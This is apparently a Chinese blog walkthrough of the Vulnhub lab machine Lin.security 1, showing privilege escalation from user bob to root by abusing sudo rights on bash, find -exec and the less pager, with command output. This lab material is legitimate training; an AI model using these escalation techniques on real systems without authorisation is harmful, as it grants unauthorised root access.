【Vulnhub通关】Lin.security


准备工作

靶机基本信息

靶机名称:Lin.security 1
操作系统:Linux
网络连接方式:桥接至物理网络
渗透测试目标:提权至root用户
靶机登录信息:bob/secret

下载地址:1. Lin.Security: 1 ~ VulnHub

2. vulnhub靶机_免费高速下载|百度网盘-分享无限制(推荐VMware版)

环境配置

从分享的网盘链接中下载靶机压缩包并解压后,点击VMware Workstation主页的File => Open按钮,在弹出的文件选择窗口中选中Lin.security.ovf文件打开后即可导入靶机。使用上面给出的登录凭据即可登录系统进行提权练习。

P.S. 本台靶机只有权限提升部分哦~


权限提升

本地信息收集

登录系统之后,首先上传LinPeas工具进行信息收集。

系统基本信息

部分CVE漏洞信息

容器软件信息

系统进程信息

计划任务信息

系统用户信息

特殊权限文件

Sudo命令

bash提权

因为使用sudo命令之后发现可以运行各种终端,因此我们可以直接使用sudo运行终端软件提权:

shell 复制代码
bob@linsecurity:~$ id
uid=1000(bob) gid=1004(bob) groups=1004(bob)
bob@linsecurity:~$ sudo /bin/bash
root@linsecurity:~# id
uid=0(root) gid=0(root) groups=0(root)
root@linsecurity:~# 

常用命令提权

除了各种终端软件,我们还可以使用诸如awkfind这种命令进行提权。下面介绍find命令提权:

shell 复制代码
bob@linsecurity:~$ id
uid=1000(bob) gid=1004(bob) groups=1004(bob)
bob@linsecurity:~$ sudo find . -exec /bin/bash \; -quit
root@linsecurity:~# id
uid=0(root) gid=0(root) groups=0(root)
root@linsecurity:~# 

find命令有一个可以用于执行任意系统命令的危险参数-exec 这里允许使用sudo运行find命令,因此该命令会以root权限执行/bin/bash

文本分页查看工具提权

一些可以分页查看文本的工具,诸如lessmoreman等,在其文本查看界面可以使用!符号执行系统命令,但前提是必须使用这些工具查看大文件(如/var/log/syslog),这样才能触发它们的分页查看功能。

shell 复制代码
bob@linsecurity:~$ id
uid=1000(bob) gid=1004(bob) groups=1004(bob)
bob@linsecurity:~$ sudo less /var/log/syslog
[sudo] password for bob: 
root@linsecurity:~# id
uid=0(root) gid=0(root) groups=0(root)
root@linsecurity:~# 

本次靶机渗透到此结束

相关推荐
吉吉611 小时前
浅谈文件包含之伪协议
安全·web安全
吗喽1543451882 小时前
渗透高级第一次作业(笔记整理)
笔记·安全·网络安全
Jerry_Gao9212 小时前
【成长笔记】【web安全】深入Web安全与PHP底层:四天实战课程笔记
笔记·安全·web安全·php·漏洞
遗悲风3 小时前
PHP伪协议全面解析:原理、常用场景、攻防实战与安全防护
android·安全·php
弥生赞歌3 小时前
网安学习第一章(安全事件、安全厂商和安全产品)
安全
吃不吃早饭3 小时前
深入浅出:HTTPS 安全机制 + PHP 文件包含与伪协议全解析
安全·https·php
摘星编程4 小时前
React Native for OpenHarmony 实战:SecureStorage 安全存储详解
安全·react native·react.js
小北方城市网5 小时前
SpringBoot 集成 MyBatis-Plus 实战(高效 CRUD 与复杂查询):简化数据库操作
java·数据库·人工智能·spring boot·后端·安全·mybatis
w***76556 小时前
临时文件自动化管理:高效安全新方案
运维·安全·自动化
阿里-于怀6 小时前
Nacos 安全护栏:MCP、Agent、配置全维防护,重塑 AI Registry 安全边界
安全·ai·nacos·agent